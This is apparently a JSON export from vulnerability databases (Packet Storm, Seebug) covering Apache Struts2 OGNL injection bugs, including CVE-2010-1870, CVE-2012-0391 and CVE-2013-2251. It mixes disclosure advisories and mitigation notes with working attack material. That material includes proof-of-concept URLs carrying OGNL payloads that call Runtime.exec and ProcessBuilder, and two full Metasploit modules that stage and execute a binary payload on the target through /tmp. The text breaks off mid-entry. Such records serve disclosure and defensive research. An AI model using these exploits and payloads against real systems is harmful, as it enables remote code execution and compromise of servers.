At the time I felt like the fix that was implemented (OGNL value stack clearing) was insufficient, but had not time to investigate this further. \n \nCVE-2010-1870 \nEarlier this year I finally got a chance to look at this again and found that in addition to the above mentioned context variables there were more: \n \n* #context - OgnlContext, the one guarding method execution based on 'xwork.MethodAccessor.denyMethodExecution' property value. \n* #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess' field prevented static method execution. \n* #root \n* #this \n* #_typeResolver \n* #_classResolver \n* #_traceEvaluations \n* #_lastEvaluation \n* #_keepLastEvaluation \n \nYou can probably see the problem already. Using XW-641 trick I was able to modify the values that were guarding Java methods execution and run arbitrary Java code: \n \n#_memberAccess['allowStaticMethodAccess'] = true \n#foo = new java .lang.Boolean(\"false\") \n#context['xwork.MethodAccessor.denyMethodExecution'] = #foo \n#rt = @java.lang.Runtime@getRuntime() \n#rt.exec('mkdir /tmp/PWNED') \n \nActual proof of concept had to use OGNL's expression evaluation when crafting HTTP request. PoC for this bug will be published on July 12 2010. To test whether your application is vulnerable you can use the following proof of concept, which will call java.lang.Runtime.getRuntime().exit(1): \n \n \nhttp://mydomain/MyStruts.action?('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true&(aaa)(('\\u0023context[\\'xwork.MethodAccessor.den \nyMethodExecution\\']\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean(\"false\")))&(asdf)(('\\u0023rt.exit(1)')(\\u0023rt\\u003d@java.lang.Runtime@getRunti \nme()))=1 \n \n \nFixing CVE-2010-1870 \nStruts2 users must upgrade to the 2.2.0, which whitelists a set of characters that excludes characters required to exploit this vulnerability. 
\n \n \nIn cases where upgrade isn't possible you can use ParameterInterceptor's \"excludeParams\" parameter to whitelist the characters required for your application to operate correctly(usually A-z0-9_.'\"[]) alternatively you can blacklist \\()@ which are the characters required to exploit this bug. \n \nTimeline \nMay 31st - email to security@struts.apache.org with vulnerability report. \nJune 4th - no response received, contacted developers again. \nJune 5th - had to find an XWork developer on IRC to look at this. \nJune 16th - Atlassian fixes vulnerability in its products. Atlassian and Struts developers worked together in coming up with the fix. \nJune 20th - 1-line fix commited \nJune 29th - Struts 2.2.0 release voting process started and is still going... \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/91774/struts2xwork-exec.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-12-05T22:12:15", "description": "", "cvss3": {}, "published": "2011-08-19T00:00:00", "type": "packetstorm", "title": "Apache Struts < 2.2.0 Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2011-08-19T00:00:00", "id": "PACKETSTORM:104227", "href": "https://packetstormsecurity.com/files/104227/Apache-Struts-2.2.0-Remote-Command-Execution.html", "sourceData": "`## \n# $Id: struts_code_exec.rb 13586 2011-08-19 05:59:32Z bannedit $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. 
\n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::CmdStagerTFTP \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts < 2.2.0 Remote Command Execution', \n'Description' => %q{ \nThis module exploits a remote command execution vulnerability in \nApache Struts versions < 2.2.0. This issue is caused by a failure to properly \nhandle unicode characters in OGNL extensive expressions passed to the web server. \n \nBy sending a specially crafted request to the Struts application it is possible to \nbypass the \"#\" restriction on ParameterInterceptors by using OGNL context variables. \nBypassing this restriction allows for the execution of arbitrary Java code. \n}, \n'Author' => \n[ \n'bannedit', # metasploit module \n'Meder Kydyraliev', # original public exploit \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 13586 $', \n'References' => \n[ \n[ 'CVE', '2010-1870'], \n[ 'OSVDB', '66280'], \n[ 'URL', 'http://www.exploit-db.com/exploits/14360/' ], \n], \n'Platform' => [ 'win', 'linux'], \n'Privileged' => true, \n'Targets' => \n[ \n['Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n['Linux Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n], \n], \n'DisclosureDate' => 'Jul 13 2010', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('URI', [ true, 'The path to a struts application action ie. 
/struts2-blank-2.0.9/example/HelloWorld.action', \"\"]), \nOptString.new('CMD', [ false, 'Execute this command instead of using command stager', \"\" ]) \n], self.class) \nend \n \ndef execute_command(cmd, opts = {}) \nuri = Rex::Text::uri_encode(datastore['URI']) \nvar_a = rand_text_alpha_lower(4) \nvar_b = rand_text_alpha_lower(2) \nvar_c = rand_text_alpha_lower(4) \nvar_d = rand_text_alpha_lower(4) \nvar_e = rand_text_alpha_lower(4) \n \nuri << \"?(%27\\\\u0023_memberAccess[\\\\%27allowStaticMethodAccess\\\\%27]%27)(#{var_a})=true&\" \nuri << \"(aaaa)((%27\\\\u0023context[\\\\%27xwork.MethodAccessor.denyMethodExecution\\\\%27]\\\\u003d\\\\u0023#{var_c}%27)(\\\\u0023#{var_c}\\\\u003dnew%20java.lang.Boolean(\\\"false\\\")))&\" \nuri << \"(#{var_b})((%27\\\\u0023#{var_d}.exec(\\\"CMD\\\")%27)(\\\\u0023#{var_d}\\\\u003d@java.lang.Runtime@getRuntime()))=1\" if target['Platform'] == 'win' \nuri << \"(asdf)(('\\\\u0023rt.exec(\\\"CMD\\\".split(\\\"@\\\"))')(\\\\u0023rt\\\\u003d@java.lang.Runtime@getRuntime()))=1\" if target['Platform'] == 'linux' \nuri.gsub!(/CMD/, Rex::Text::uri_encode(cmd)) \n \nvprint_status(\"Attemping to execute: #{cmd}\") \n \nresp = send_request_raw({ \n'uri' => uri, \n'version' => '1.1', \n'method' => 'GET', \n}, 5) \nend \n \ndef windows_stager \nexe_fname = rand_text_alphanumeric(4+rand(4)) + \".exe\" \n \nprint_status(\"Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}\") \nexecute_cmdstager({ :temp => '.'}) \n@payload_exe = payload_exe \n \nprint_status(\"Attempting to execute the payload...\") \nexecute_command(@payload_exe) \nend \n \ndef linux_stager \ncmds = \"/bin/sh@-c@echo LINE | tee FILE\" \nexe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) \nbase64 = Rex::Text.encode_base64(exe) \nbase64.gsub!(/\\=/, \"\\\\u003d\") \nfile = rand_text_alphanumeric(4+rand(4)) \n \nexecute_command(\"/bin/sh@-c@touch /tmp/#{file}.b64\") \ncmds.gsub!(/FILE/, \"/tmp/\" + file + \".b64\") \nbase64.each_line do |line| \nline.chomp! 
\ncmd = cmds \ncmd.gsub!(/LINE/, line) \nexecute_command(cmds) \nend \n \nexecute_command(\"/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}\") \nexecute_command(\"/bin/sh@-c@chmod +x /tmp/#{file}\") \nexecute_command(\"/bin/sh@-c@rm /tmp/#{file}.b64\") \n \nexecute_command(\"/bin/sh@-c@/tmp/#{file}\") \n@payload_exe = \"/tmp/\" + file \nend \n \ndef on_new_session(client) \nif target['Platform'] == 'linux' \nprint_status(\"deleting #{@payload_exe} payload file\") \nexecute_command(\"/bin/sh@-c@rm #{@payload_exe}\") \nelse \nprint_status(\"Windows does not allow running executables to be deleted\") \nprint_status(\"delete the #{@payload_exe} file manually after migrating\") \nend \nend \n \ndef exploit \nif not datastore['CMD'].empty? \nprint_status(\"Executing user supplied command\") \nexecute_command(datastore['CMD']) \nreturn \nend \n \ncase target['Platform'] \nwhen 'linux' \nlinux_stager \nwhen 'win' \nwindows_stager \nelse \nraise RuntimeError, 'Unsupported target platform!' \nend \n \nhandler \nend \nend`\n", "sourceHref": "https://packetstormsecurity.com/files/download/104227/struts_code_exec.rb.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-12-05T22:12:59", "description": "", "cvss3": {}, "published": "2012-06-05T00:00:00", "type": "packetstorm", "title": "Apache Struts 2.2.1.1 Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0391"], "modified": "2012-06-05T00:00:00", "id": "PACKETSTORM:113272", "href": "https://packetstormsecurity.com/files/113272/Apache-Struts-2.2.1.1-Remote-Command-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. 
\n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::CmdStagerTFTP \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts <= 2.2.1.1 Remote Command Execution', \n'Description' => %q{ \nThis module exploits a remote command execution vulnerability in \nApache Struts versions < 2.2.1.1. This issue is caused because the \nExceptionDelegator interprets parameter values as OGNL expressions \nduring certain exception handling for mismatched data types of properties, \nwhich allows remote attackers to execute arbitrary Java code via a \ncrafted parameter. \n}, \n'Author' => \n[ \n'Johannes Dahse', # Vulnerability discovery and PoC \n'Andreas Nusser', # Vulnerability discovery and PoC \n'juan vazquez', # Metasploit module \n'sinn3r' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: $', \n'References' => \n[ \n[ 'CVE', '2012-0391'], \n[ 'OSVDB', '78277'], \n[ 'EDB', '18329'], \n[ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt'] \n], \n'Platform' => [ 'win', 'linux'], \n'Privileged' => true, \n'Targets' => \n[ \n['Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n} \n], \n['Linux Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n} \n], \n], \n'DisclosureDate' => 'Jan 06 2012', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. 
/HelloWorldStruts2/hello?name=test&id=INJECT', \"\"]), \nOptString.new('CMD', [ false, 'Execute this command instead of using command stager', \"\" ]) \n], self.class) \nend \n \ndef execute_command(cmd, opts = {}) \n \nuri = String.new(datastore['TARGETURI']) \nuri.gsub!(/INJECT/, \"'%2b(%23_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,@java.lang.Runtime@getRuntime().exec(\\\"CMD\\\"))%2b'\") if target['Platform'] == 'win' \nuri.gsub!(/INJECT/, \"'%2b(%23_memberAccess[\\\"allowStaticMethodAccess\\\"]=true,@java.lang.Runtime@getRuntime().exec(\\\"CMD\\\".split(\\\"@\\\")))%2b'\") if target['Platform'] == 'linux' \nuri.gsub!(/CMD/, Rex::Text::uri_encode(cmd)) \n \nvprint_status(\"Attempting to execute: #{cmd}\") \n \nresp = send_request_raw({ \n'uri' => uri, \n'version' => '1.1', \n'method' => 'GET', \n}, 5) \n \nend \n \ndef windows_stager \nexe_fname = rand_text_alphanumeric(4+rand(4)) + \".exe\" \n \nprint_status(\"Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}\") \nexecute_cmdstager({ :temp => '.'}) \n@payload_exe = payload_exe \n \nprint_status(\"Attempting to execute the payload...\") \nexecute_command(@payload_exe) \nend \n \ndef linux_stager \ncmds = \"/bin/sh@-c@echo LINE | tee FILE\" \nexe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw) \nbase64 = Rex::Text.encode_base64(exe) \nbase64.gsub!(/\\=/, \"\\\\u003d\") \nfile = rand_text_alphanumeric(4+rand(4)) \n \nexecute_command(\"/bin/sh@-c@touch /tmp/#{file}.b64\") \ncmds.gsub!(/FILE/, \"/tmp/\" + file + \".b64\") \nbase64.each_line do |line| \nline.chomp! 
\ncmd = cmds \ncmd.gsub!(/LINE/, line) \nexecute_command(cmds) \nend \n \nexecute_command(\"/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}\") \nexecute_command(\"/bin/sh@-c@chmod +x /tmp/#{file}\") \nexecute_command(\"/bin/sh@-c@rm /tmp/#{file}.b64\") \n \nexecute_command(\"/bin/sh@-c@/tmp/#{file}\") \n@payload_exe = \"/tmp/\" + file \nend \n \ndef on_new_session(client) \nif target['Platform'] == 'linux' \nprint_status(\"Deleting #{@payload_exe} payload file\") \nexecute_command(\"/bin/sh@-c@rm #{@payload_exe}\") \nelse \nprint_status(\"Windows does not allow running executables to be deleted\") \nprint_status(\"Delete the #{@payload_exe} file manually after migrating\") \nend \nend \n \ndef exploit \nif not datastore['CMD'].empty? \nprint_status(\"Executing user supplied command\") \nexecute_command(datastore['CMD']) \nreturn \nend \n \ncase target['Platform'] \nwhen 'linux' \nlinux_stager \nwhen 'win' \nwindows_stager \nelse \nraise RuntimeError, 'Unsupported target platform!' \nend \n \nhandler \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/113272/struts_code_exec_exception_delegator.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:20:27", "description": "", "cvss3": {}, "published": "2013-08-13T00:00:00", "type": "packetstorm", "title": "Struts2 2.3.15 OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2013-08-13T00:00:00", "id": "PACKETSTORM:122796", "href": "https://packetstormsecurity.com/files/122796/Struts2-2.3.15-OGNL-Injection.html", "sourceData": "`CVE Number: CVE-2013-2251 \nTitle: Struts2 Prefixed Parameters OGNL Injection Vulnerability \nAffected Software: Apache Struts v2.0.0 - 2.3.15 \nCredit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc. 
\nIssue Status: v2.3.15.1 was released which fixes this vulnerability \nIssue ID by Vender: S2-016 \n \nOverview: \nStruts2 is an open-source web application framework for Java. \nStruts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which \nleads to arbitrary Java method execution on the target server. This is \ncaused by insecure handling of prefixed special parameters (action:, \nredirect: and redirectAction:) in DefaultActionMapper class of Struts2. \n \nDetails: \n<About DefaultActionMapper> \n \nStruts2's ActionMapper is a mechanism for mapping between incoming HTTP \nrequest and action to be executed on the server. DefaultActionMapper is \na default implementation of ActionMapper. It handles four types of \nprefixed parameters: action:, redirect:, redirectAction: and method:. \n \nFor example, redirect prefix is used for HTTP redirect. \n \nNormal redirect prefix usage in JSP: \n<s:form action=\"foo\"> \n... \n<s:submit value=\"Register\"/> \n<s:submit name=\"redirect:http://www.google.com/\" value=\"Cancel\"/> \n</s:form> \n \nIf the cancel button is clicked, redirection is performed. \n \nRequest URI for redirection: \n/foo.action?redirect:http://www.google.com/ \n \nResopnse Header: \nHTTP/1.1 302 Found \nLocation: http://www.google.com/ \n \nUsage of other prefixed parameters is similar to redirect. \nSee Struts2 document for details. \nhttps://cwiki.apache.org/confluence/display/WW/ActionMapper \n \n<How the Attack Works> \n \nAs stated already, there are four types of prefixed parameters. \n \naction:, redirect:, redirectAction:, method: \n \nAll except for method: can be used for attacks. But regarding action:, \nit can be used only if wildcard mapping is enabled in configuration. \nOn the one hand, redirect: and redirectAction: are not constrained by \nconfiguration (thus they are convenient for attackers). \n \nOne thing that should be noted is that prefixed parameters are quite \nforceful. 
It means that behavior of application which is not intended \nto accept prefixed parameters can also be overwritten by prefixed \nparameters added to HTTP request. Therefore all Struts2 applications \nthat use DefaultActionMapper are vulnerable to the attack. \n \nThe injection point is name of prefixed parameters. \nExample of attack using redirect: is shown below. \n \nAttack URI: \n/bar.action?redirect:http://www.google.com/%25{1000-1} \n \nResponse Header: \nHTTP/1.1 302 Found \nLocation: http://www.google.com/999 \n \nAs you can see, expression (1000-1) is evaluated and the result (999) \nis appeared in Location response header. As I shall explain later, \nmore complex attacks such as OS command execution is possible too. \n \nIn DefaultActionMapper, name of prefixed parameter is once stored as \nActionMapping object and is later executed as OGNL expression. \nRough method call flow in execution phase is as the following. \n \norg.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter() \norg.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction() \norg.apache.struts2.dispatcher.Dispatcher.serviceAction() \norg.apache.struts2.dispatcher.StrutsResultSupport.execute() \norg.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse() \ncom.opensymphony.xwork2.util.TextParseUtil.translateVariables() \ncom.opensymphony.xwork2.util.OgnlTextParser.evaluate() \n \nProof of Concept: \n<PoC URLs> \n \nPoC is already disclosed on vender's web page. \nhttps://struts.apache.org/release/2.3.x/docs/s2-016.html \n \nBelow PoC URLs are just quotes from the vender's page. 
\n \nSimple Expression: \nhttp://host/struts2-blank/example/X.action?action:%25{3*4} \nhttp://host/struts2-showcase/employee/save.action?redirect:%25{3*4} \n \nOS Command Execution: \nhttp://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} \nhttp://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} \nhttp://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} \n \nObviously such attacks are not specific to blank/showcase application, \nbut all Struts2 based applications may be subject to attacks. \n \n<OS Command Execution and Static Method Call> \n \nAnother topic that I think worth mentioning is that PoC URLs use \nProcessBuilder class to execute OS commands. The merit of using this \nclass is that it does not require static method to execute OS commands, \nwhile Runtime class does require it. \n \nAs you may know, static method call in OGNL is basically prohibited. \nBut in Struts2 <= v2.3.14.1 this restriction was easily bypassed by \na simple trick: \n \n%{#_memberAccess['allowStaticMethodAccess']=true, \n@java.lang.Runtime@getRuntime().exec('your commands')} \n \nIn Struts v2.3.14.2, SecurityMemberAccess class has been changed to \nprevent the trick. However there are still some techniques to call \nstatic method in OGNL. \n \nOne technique is to use reflection to replace static method call to \ninstance method call. 
Another technique is to overwrite #_memberAccess \nobject itself rather than property of the object: \n \n%{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true), \n@java.lang.Runtime@getRuntime().exec('your commands')} \n \nProbably prevention against static method is just an additional layer \nof defense, but I think that global objects such as #_memberAccess \nshould be protected from rogue update. \n \nTimeline: \n2013/06/24 Reported to Struts Security ML \n2013/07/17 Vender announced v2.3.15.1 \n2013/08/10 Disclosure of this advisory \n \nRecommendation: \nImmediate upgrade to the latest version is strongly recommended as \nactive attacks have already been observed. It should be noted that \nredirect: and redirectAction: parameters were completely dropped and \ndo not work in the latest version as stated in the vender's page. \nThus attention for compatibility issues is required for upgrade. \n \nIf you cannot upgrade your Struts2 immediately, filtering (by custom \nservlet filter, IPS, WAF and so on) can be a mitigation solution for \nthis vulnerability. Some points about filtering solution are listed \nbelow. \n \n- Both %{expr} and ${expr} notation can be used for attacks. \n- Parameters both in querystring and in request body can be used. \n- redirect: and redirectAction: can be used not only for Java method \nexecution but also for open redirect. \n \nSee S2-017 (CVE-2013-2248) for open redirect issue. 
\nhttps://struts.apache.org/release/2.3.x/docs/s2-017.html \n \nReference: \nhttps://struts.apache.org/release/2.3.x/docs/s2-016.html \nhttps://cwiki.apache.org/confluence/display/WW/ActionMapper \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/122796/struts2315ognl-inject.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:42:29", "description": "BUGTRAQ ID: 60167\r\nCVE(CAN) ID: CVE-2013-2115\r\n\r\nStruts2 is the second-generation Java enterprise web application framework based on the Model-View-Controller (MVC) model. It is the product of the merger of the WebWork and Struts communities.\r\n\r\nApache Struts 2.0.0-2.3.14.1 contains a security-measure bypass vulnerability (CVE-2013-1966) that was not completely fixed; an attacker can exploit it to execute arbitrary code with the privileges of the current user. This vulnerability has been fixed in Struts 2.3.14.2.\r\n0\r\nApache Group Struts2 2.0.0 - 2.3.14.1\r\nVendor patch:\r\n\r\nApache\r\n------\r\nApache has released a security advisory (S2-014) and the corresponding patch for this:\r\nS2-014: A vulnerability introduced by forcing parameter inclusion in the URL and Anchor Tag allows remote command execution, session access and manipulation and XSS attacks\r\nLink: https://cwiki.apache.org/confluence/display/WW/S2-014", "cvss3": {}, "published": "2013-05-30T00:00:00", "title": "Apache Struts 'includeParams' Incomplete Fix Security Bypass Vulnerability (CVE-2013-2115)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2013-05-30T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60812", 
"id": "SSV:60812", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:54:02", "description": "BUGTRAQ ID: 60346\r\nCVE(CAN) ID: CVE-2013-2134\r\n\r\nStruts2 is the second-generation Java enterprise web application framework based on the Model-View-Controller (MVC) model. It is the product of the merger of the WebWork and Struts communities.\r\n\r\nApache Struts 2.0.0-2.3.14.3 contains a remote OGNL expression injection vulnerability; a remote attacker can exploit it to manipulate server-side objects and execute arbitrary commands in the context of the affected application. The vulnerability stems from a wildcard matching error.\r\n0\r\nApache Group Struts 2.x\r\nVendor patch:\r\n\r\nApache Group\r\n------------\r\nApache Group has released a security advisory (s2-015) and the corresponding patch for this:\r\ns2-015: S2-015\r\nLink: http://struts.apache.org/development/2.x/docs/s2-015.html\r\n\r\nPatch download: http://struts.apache.org/download.cgi#struts23143", "cvss3": {}, "published": "2013-06-11T00:00:00", "type": "seebug", "title": "Apache Struts OGNL Expression Injection Vulnerability (CVE-2013-2134)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2134"], "modified": "2013-06-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60836", "id": "SSV:60836", "sourceData": "\n http://www.example.com/example/%24%7B%23foo%3D%27Menu%27%2C%23foo%7D\r\n\r\nhttp://www.example.com/example/${#foo='Menu',#foo}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-60836", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, 
{"lastseen": "2017-11-19T17:41:13", "description": "CVE-2013-2251\r\nStruts2 is the second-generation Java enterprise web application framework based on the Model-View-Controller (MVC) model. It is the product of the merger of the WebWork and Struts communities\r\n\r\nThe action:, redirect: and redirectAction: prefixed parameters of Apache Struts2 use Ognl expressions to implement their functionality and concatenate content submitted by the user via the URL into the Ognl expression, so an attacker can execute arbitrary Java code, and hence arbitrary commands, by constructing a malicious URL\r\n\r\nThe redirect: and redirectAction: prefixes are enabled by default in Struts; all Struts versions below 2.3.15.1 currently contain this vulnerability\r\n\r\nApache Struts2 has now patched this vulnerability in 2.3.15.1. Apache Struts2 users are strongly advised to check whether they are affected by this issue and to upgrade to the latest version as soon as possible\r\n0\r\nApache Struts 2.0.0 - Apache Struts 2.3.15\r\nVendor status:\r\n==========\r\nThe vendor has released Apache Struts 2.3.15.1 to fix this security vulnerability; Struts users are advised to upgrade to the latest version promptly.\r\n\r\nVendor security advisory: S2-016\r\nLink: http://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n\r\nSoftware upgrade page: http://struts.apache.org/download.cgi#struts23151", "cvss3": {}, "published": "2013-07-17T00:00:00", "title": "Apache Struts2 
Multiple Prefixed Parameter Remote Command Execution Vulnerability (CVE-2013-2251)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-2251"], "modified": "2013-07-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60906", "id": "SSV:60906", "sourceData": "\n Since Apache Struts2 has disabled the redirect parameters in the latest patched version 2.3.15.1, if the redirect function still works, the system is affected by this vulnerability:\r\n\r\nhttp://host/struts2-showcase/employee/save.action?redirect:http://www.yahoo.com/\r\n\r\nIf the page redirects to www.yahoo.com, the current system is affected by this vulnerability.\r\n\r\nVerifying expression evaluation and command execution:\r\n\r\nhttp://host/struts2-showcase/employee/save.action?redirect:%25{3*4}\r\nhttp://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-60906", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:04:07", "description": "CVE ID: CVE-2010-1870\r\n\r\nVMware vCenter Orchestrator is an application for automating management tasks. Alive Enterprise is an application for monitoring processes.\r\n\r\nVMware vCenter Orchestrator and Alive Enterprise contain a remote code execution vulnerability in their implementation: both products embed the third-party component Apache 
Struts, and the remote code execution vulnerability in this component allows a malicious user to bypass the '#'-usage protection in ParametersInterceptor and take control of server-side context objects.\r\n\n\nVMWare VMware vCenter Orchestrator 4.1\r\nVMWare VMware vCenter Orchestrator 4.0\r\nVMWare Alive Enterprise 7.2\nVendor patch:\r\n\r\nVMWare\r\n------\r\nThe vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage:\r\n\r\nhttp://www.vmware.com", "cvss3": {}, "published": "2011-05-10T00:00:00", "title": "VMware vCenter Orchestrator and Alive Enterprise Remote Code Execution Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2011-05-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20526", "id": "SSV:20526", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-19T18:09:11", "description": "No description provided by source.", "cvss3": {}, "published": "2010-07-15T00:00:00", "type": "seebug", "title": "Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2010-07-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19954", "id": "SSV:19954", "sourceData": "\n Friday, July 9, 2010\r\nCVE-2010-1870: Struts2/XWork remote command execution\r\nUpdate Tue Jul 13 2010: Added proof of concept\r\n \r\nApache Struts team has announced uploaded but has not released, due to an unreasonably prolonged voting process, the 2.2.0 release of the Struts2 web framework which fixes vulnerability that I've reported to them on May 31st 2010. 
Apache Struts team is ridiculously slow in releasing the fixed version and all of my attempts to expedite the process have failed.\r\n \r\nIntroduction\r\nStruts2 is Struts + WebWork. WebWork in turn uses XWork to invoke actions and call appropriate setters/getters based on HTTP parameter names, which is achieved by treating each HTTP parameter name as an OGNL statement. OGNL (Object Graph Navigation Language) is what turns:\r\n \r\nuser.address.city=Bishkek&user['favoriteDrink']=kumys\r\n \r\ninto\r\n \r\naction.getUser().getAddress().setCity("Bishkek")\r\naction.getUser().setFavoriteDrink("kumys")\r\n \r\nThis is performed by the ParametersInterceptor, which calls ValueStack.setValue() with user-supplied HTTP parameters as arguments.\r\nNOTE: If you are using XWork's ParametersInterceptor or operate with OGNL ValueStack in a similar way then you are vulnerable (ParametersInterceptor is on by default in struts-default.xml).\r\n \r\nIn addition to property getting/setting, OGNL supports many more features:\r\n \r\n * Method calling: foo()\r\n * Static method calling: @java.lang.System@exit(1)\r\n * Constructor calling: new MyClass()\r\n * Ability to work with context variables: #foo = new MyClass()\r\n * And more...\r\n \r\nSince HTTP parameter names are OGNL statements, to prevent an attacker from calling arbitrary methods via HTTP parameters XWork has the following two variables guarding methods execution:\r\n \r\n * OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution' (set to true by default)\r\n * SecurityMemberAccess private field called 'allowStaticMethodAccess' (set to false by default)\r\n \r\nOGNL Context variables\r\nTo make it easier for developer to access various frequently needed objects XWork provides several predefined context variables:\r\n \r\n * #application\r\n * #session\r\n * #request\r\n * #parameters\r\n * #attr\r\n \r\nThese variables represent various server-side objects, such as session map. 
To prevent attackers from tampering with server-side objects XWork's ParametersInterceptor disallowed # in parameter names. About a year ago I found a way to bypass that protection(XW-641) using Java's unicode String representation: \\u0023. At the time I felt like the fix that was implemented (OGNL value stack clearing) was insufficient, but had not time to investigate this further.\r\n \r\nCVE-2010-1870\r\nEarlier this year I finally got a chance to look at this again and found that in addition to the above mentioned context variables there were more:\r\n \r\n * #context - OgnlContext, the one guarding method execution based on 'xwork.MethodAccessor.denyMethodExecution' property value.\r\n * #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess' field prevented static method execution.\r\n * #root\r\n * #this\r\n * #_typeResolver\r\n * #_classResolver\r\n * #_traceEvaluations\r\n * #_lastEvaluation\r\n * #_keepLastEvaluation\r\n \r\nYou can probably see the problem already. Using XW-641 trick I was able to modify the values that were guarding Java methods execution and run arbitrary Java code:\r\n \r\n#_memberAccess['allowStaticMethodAccess'] = true\r\n#foo = new java .lang.Boolean("false")\r\n#context['xwork.MethodAccessor.denyMethodExecution'] = #foo\r\n#rt = 